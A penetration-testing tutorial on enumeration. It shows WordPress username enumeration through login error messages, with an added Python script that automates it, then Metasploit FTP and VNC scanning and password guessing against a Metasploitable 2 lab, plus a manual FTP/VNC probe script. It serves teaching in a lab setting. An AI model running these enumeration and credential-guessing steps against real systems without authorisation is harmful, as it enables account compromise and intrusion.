What is Enumeration?
Enumeration is the process of actively connecting to the target system and extracting information from it. In most cases it is used to find valid usernames or passwords, but the same techniques recover user and group lists, hostnames, running network services, routing tables and so on. If you work in cybersecurity you will meet this term constantly. The picture below shows a basic example of enumerating a username.
Basic Example of Enumeration.
In this picture you can see a WordPress login page running on my local server. In the first attempt I entered the username 123456 with the password 123456; in the second I entered the username admin with the same password. The two attempts produced different errors. For 123456 WordPress replied that the username or password was wrong, which tells me nothing definite; for admin it replied that the password was wrong, which confirms that admin is a valid username. This is manual username enumeration: the application's own error messages act as an oracle, and every candidate name can be confirmed or rejected with a single request. The defence is the same message for both cases (plus rate limiting on the login form).
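As an added example (not code from the original post), here is the same oracle automated. It classifies wp-login.php responses by their error text and runs a list of candidate names through it. The HTTP request is injected as a function, so the logic runs offline on the constructed responses at the bottom; the error strings and the form field names (log, pwd) are assumed from stock WordPress, whose exact wording varies by version, so compare against one real response before relying on it.

```python
"""Username enumeration through differing WordPress login error messages.

Added example, not code from the original post. The HTTP request is
injected as a function so the oracle logic runs offline on the constructed
responses at the bottom; point http_post_login at a real wp-login.php only
on a system you are authorised to test."""
import urllib.parse
import urllib.request

# Markers for the two stock WordPress messages (assumed from stock WordPress;
# wording differs slightly between versions, so check one real response).
UNKNOWN_USER_MARKERS = ("Invalid username", "is not registered on this site")
KNOWN_USER_MARKERS = ("The password you entered for the username",)


def classify_response(html: str) -> str:
    """Map a wp-login.php response body to 'valid', 'invalid' or 'unknown'."""
    if any(m in html for m in KNOWN_USER_MARKERS):
        return "valid"      # the user exists, only the password was wrong
    if any(m in html for m in UNKNOWN_USER_MARKERS):
        return "invalid"    # no such user
    return "unknown"        # generic message, lockout, WAF block: no oracle


def http_post_login(url, username, password="123456"):
    """Live fetch: submit the login form (stock field names log/pwd) and return the body."""
    data = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "enum-demo"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_usernames(candidates, fetch):
    """Run each candidate through the oracle; fetch(username) returns the response body."""
    return {user: classify_response(fetch(user)) for user in candidates}


# Constructed responses standing in for a live server (not captured from the post's setup).
SAMPLE_RESPONSES = {
    "admin": '<div id="login_error"><strong>Error:</strong> The password you entered '
             'for the username <strong>admin</strong> is incorrect.</div>',
    "123456": '<div id="login_error"><strong>Error:</strong> Invalid username.</div>',
    # A hardened site that returns one generic message for both cases:
    "bob": '<div id="login_error"><strong>Error:</strong> The username or password '
           'you entered is incorrect.</div>',
}


def fake_fetch(username):
    return SAMPLE_RESPONSES.get(username, "")


if __name__ == "__main__":
    for user, verdict in enumerate_usernames(["admin", "123456", "bob"], fake_fetch).items():
        print(f"{user:10} {verdict}")
    # Live use, against an authorised target only:
    # enumerate_usernames(["admin", "editor"],
    #                     lambda u: http_post_login("http://wp.local/wp-login.php", u))
```

The third constructed response shows what the oracle sees on a site that returns one generic message: the verdict is "unknown" for every name, which is exactly what a defender wants.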
In this tutorial we will look at how to enumerate with the help of Metasploit, one of the best known penetration testing frameworks. I am using Kali Linux as the attacker machine and Metasploitable 2, a deliberately vulnerable Linux machine, as the target.
Open a terminal on Kali, type msfconsole, and create a separate workspace with
workspace -a metasploit_Linux
This creates a workspace. In simple terms a workspace is a separate directory for each engagement: if you are attacking two different machines you can keep the Metasploit data (hosts, services, credentials, loot) for each one apart. Choose any name you like.
After creating the workspace we need the IP address of the target. In this case the target is on the local network, so netdiscover will find it; if the target is on the internet you need to find it through footprinting techniques instead.
sudo netdiscover -r 192.168.197.0/24
Now we have the target's IP address, 192.168.197.130. The first thing to do is scan it for open ports and services. Type the following command inside msfconsole: db_nmap runs Nmap and stores the results in the current workspace (the database has to be initialised with msfdb init first).
db_nmap -p- -T4 -O -Pn -sV 192.168.197.130
Nmap scans the IP address and prints the open ports and services on the terminal. As I said, this is a vulnerable machine built for hacking practice, so you can see a lot of open ports and running services.
As an ethical hacker you cannot rely completely on tools, and never on a single tool: no tool gives a 100% correct result every time. Check the findings manually or with a second tool, and only if you still find nothing conclude that there is nothing. In this tutorial I am only showing Metasploit, but you should use other tools alongside it to confirm the results.
For this tutorial I will show enumeration of a few ports and services only; in a real engagement you should enumerate every open port.
You can see in the result that port 21 (FTP) is open, so let us enumerate it. If you type
use auxiliary/scanner/ftp/
and press the Tab key twice, msfconsole lists all the FTP scanner modules available. Try each of them to learn what they do; for this tutorial I am using the anonymous module to check whether the FTP server allows anonymous login.
To do that, type the following commands in msfconsole. Note the trick with setg: normally we use set, but setg stores the value in the global datastore, so every module you load afterwards in this session inherits the target address and you do not have to type it again for each scanner or exploit. Scanner modules take the option RHOSTS; older tutorials write RHOST, which current Metasploit accepts as an alias. For an auxiliary module run and exploit do the same thing.
use auxiliary/scanner/ftp/anonymous
setg RHOSTS 192.168.197.130
set RPORT 21
run
After the run, the module reports Anonymous READ together with the FTP server version. To connect to the target over FTP, open a new terminal and run the command below; enter anonymous as the username and just press Enter at the password prompt (anonymous FTP needs no password; by convention you can give an e-mail address).
ftp 192.168.197.130
The port scan also shows VNC running on the target, so let us enumerate it. Again, type use auxiliary/scanner/vnc/ and press Tab twice to see all the VNC modules. There are a lot of them, but we will use vnc_login, which tries to authenticate with a password list; try the others yourself to get to know them. Run the following commands:
use auxiliary/scanner/vnc/vnc_login
setg RHOSTS 192.168.197.130
set RPORT 5900
run
When it finishes you can see the password found for the VNC server (VNC authentication has no username, only a password) and you can use it to get a remote session. To connect, open a new terminal and start your VNC viewer against the target (the password is password).
You can see that I got VNC access, and whoami shows that I have root privileges. Use the same trick (use auxiliary/scanner/ followed by two Tab presses) to see the modules available for other ports and services such as HTTP, MySQL and so on.
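Following the advice above to confirm tool output by hand, here is an added example (not from the original post and not Metasploit's code) that re-checks both findings without msfconsole: it attempts the anonymous FTP login with Python's ftplib and performs the first two steps of the VNC (RFB) handshake to read the protocol version and the security types the server offers, which tells you whether a password is required at all before you start guessing one. The target address is assumed from the scan above; the handshake parsers work on raw bytes, so they can be exercised offline on constructed server messages.

```python
"""Manual cross-check of the FTP and VNC findings (added example, not from
the original post or from Metasploit). The network functions need a
reachable target; the RFB parsers run offline on constructed bytes."""
import ftplib
import re
import socket

TARGET = "192.168.197.130"  # assumption: the Metasploitable 2 address from the scan

RFB_VERSION_RE = re.compile(rb"^RFB (\d{3})\.(\d{3})\n$")
# RFB security types, RFC 6143 section 7.1.2
SECURITY_TYPES = {0: "invalid", 1: "None", 2: "VNC Authentication"}


def parse_rfb_version(banner: bytes):
    """Parse the 12-byte ProtocolVersion message a VNC server sends first."""
    m = RFB_VERSION_RE.match(banner)
    if not m:
        raise ValueError(f"not an RFB banner: {banner!r}")
    return int(m.group(1)), int(m.group(2))


def parse_security_types(data: bytes):
    """Parse the SecurityTypes message (RFB 3.7+): a count byte, then one byte per type.
    A count of 0 means the server refused us; a u32 length and a reason string follow."""
    if not data:
        raise ValueError("empty security-types message")
    count = data[0]
    if count == 0:
        reason_len = int.from_bytes(data[1:5], "big")
        raise ConnectionError(data[5:5 + reason_len].decode("latin-1", "replace"))
    if len(data) < 1 + count:
        raise ValueError("truncated security-types message")
    return [SECURITY_TYPES.get(t, f"type {t}") for t in data[1:1 + count]]


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def vnc_probe(host=TARGET, port=5900, timeout=5):
    """Read the server version, echo it back, and return the offered security types."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        version = parse_rfb_version(_recv_exact(s, 12))
        s.sendall(b"RFB %03d.%03d\n" % version)   # agree to the server's version
        if version >= (3, 7):
            types = parse_security_types(s.recv(256))
        else:
            # RFB 3.3: the server dictates a single type as a big-endian u32; 0 = refused
            t = int.from_bytes(_recv_exact(s, 4), "big")
            if t == 0:
                raise ConnectionError("server refused the connection")
            types = [SECURITY_TYPES.get(t, f"type {t}")]
    return version, types


def ftp_anonymous(host=TARGET, port=21, timeout=5):
    """Try the anonymous login; return (allowed, banner, listing_or_error)."""
    ftp = ftplib.FTP()
    try:
        banner = ftp.connect(host, port, timeout=timeout)
        try:
            ftp.login("anonymous", "anonymous@example.com")
        except ftplib.error_perm as e:
            return False, banner, str(e)
        try:
            listing = ftp.nlst()
        except ftplib.error_perm as e:   # logged in, but no permission to list
            listing = [str(e)]
        return True, banner, listing
    finally:
        ftp.close()


if __name__ == "__main__":
    allowed, banner, detail = ftp_anonymous()
    print("FTP banner:", banner)
    print("anonymous login:", "ALLOWED" if allowed else "denied", detail)
    version, types = vnc_probe()
    print("VNC protocol %d.%d, security types: %s" % (*version, ", ".join(types)))
```

A server that offers only "None" needs no password at all, "VNC Authentication" is the challenge-response login that vnc_login attacks, and a refusal reason such as "Too many security failures" is a sign the server is already rate limiting you and further guessing will only lock you out.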